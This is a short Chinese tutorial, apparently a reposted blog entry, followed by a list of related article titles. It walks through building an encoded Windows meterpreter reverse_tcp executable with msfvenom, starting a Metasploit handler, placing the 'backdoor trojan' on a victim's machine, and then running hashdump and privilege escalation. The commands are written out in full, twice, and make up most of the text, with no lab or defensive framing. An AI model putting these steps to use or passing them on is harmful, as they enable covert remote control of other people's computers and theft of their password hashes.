kali之msfconsole
1.启动msfconsole命令模式
2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
3.启动msfconsole命令模式 use exploit/multi/handler 使用handler这个模块,set PAYLOAD windows/meterpreter/reverse_tcp show options如果看到没有热河参数直接下一步(set LHOST=自己的ip set LPORT=端口),
然后
使用这个shellcode 然后show options 看到提示 LHOST LPORT 这里填生成木马的自己的ip和端口 set LHOST 自己的ip 回车 然后set LPORT 端口
4.exploit 回车 然后等待目标点击test.ext文件上线
1.执行以下命令:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
2.将test.exe复制到受害者主机上
3.在Kali中输入msfconsole,并按照下图进行配置:
4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈
session
得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。
转载于:https://www.cnblogs.com/sugarxt/p/10557658.html
kali之msfconsole相关推荐
- kali终端打不开以及msfconsole打不开
卡利出现的问题 kali终端terminal emulator打不开 kali中msfconsole打不开 kali终端terminal emulator打不开 解决方法 1.crtl + alt + ...
- Kali安装之后必做20件事 第二版(2017-07-07不断更新)
原文地址: http://blog.niuti.org/post/380915_5a5b269# 一,更换比较快的软件源 修改sources.list文件(su): leafpad /etc/apt/ ...
- Kali Linux渗透测试实战 第一章
玄魂 · 2013/12/26 16:23 作者博客:www.xuanhun521.com/ 1.1 Kali Linux简介 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需 ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- 20159208 《网络攻防实践》第七周学习总结
20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 本周主要学习了教材的第七章:Window ...
- ProxyChains
proxychains-ng:https://github.com/rofl0r/proxychains-ng proxychains:https://github.com/haad/proxycha ...
- 《网络对抗》Exp5 MSF基础应用
20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...
- 20145226夏艺华 后门原理与实践
20145226夏艺华 后门原理与实践 实验主要内容 使用ncat.socat实现两台电脑间的后门连接:meterpreter的应用:MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进 ...
- Windows系统利用5次shift维权漏洞复现
操作系统: Windows 7 旗舰版 工具: kali系统的msfconsole 5次shift维权原理 Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\Syste ...
- 【转载】Kali-linux安装之后的简单设置
1.更新软件源: 修改sources.list文件: leafpad /etc/apt/sources.list 然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源 d ...
最新文章
- 锐捷大中型企业VLAN网络方案
- 基础中的基础。CANVAS step01
- myeclipse安装svn插件
- 『物理社工』五一回家的“小插曲”
- 工作174:数组转换为对象项目案例
- 在win8下安装使用java及在win8下部署java环境变量-图文
- 《Java编码指南:编写安全可靠程序的75条建议》—— 指南19:对细粒度的安全定义自定义安全权限...
- 中源数聚携手中科点击共推管理咨询变革
- win11搜索栏无法输入 Windows11搜索栏无法输入的解决方法
- PHP远程操纵Wordpress的方法(流程剖析)
- web服务器通信原理
- iis6.0远程代码执行漏洞
- 公司职员薪水管理系统(List)
- (三十七)java SpringCloud版本b2b2c鸿鹄云商平台全套解决方案
- CSS强制图像调整大小并保持纵横比
- python3.8零基础入门教程_正版 Python 3.8编程快速入门 针对wan全零基础入门的读者 采用*小化安装+极简代码的教学...
- linux服务器开机提示f1,Dell的Linux服务器开机按F1解决方法
- word文档保存的时候,就会出现“文件许可权错误,word 无法完成保存文件”的提示
- java学籍管理系统_JavaWeb实现学生学籍信息管理系统
- 【整理】MySQL引擎
热门文章
- java 网吧管理系统_java网吧信息管理系统
- 极通EWEBS远程接入v4.2 XP专版
- php如何大批量群发微信模板消息,如何用php实现发送微信模板消息呢?
- php微信推送的模板信息内容都是空,微信模板消息 推送成功 但是内容显示空白...
- 使用微软官方升级工具升级win11的方法
- 带下拉菜单截图 巧用PrtSc截图键
- dw01均衡电路_基于DW01芯片的锂电池保护电路设计
- Linux下搭建打印机共享服务器(支持苹果AirPrint)
- pdf格式压缩大小,pdf如何压缩大小?
- 国产高分系列卫星平台介绍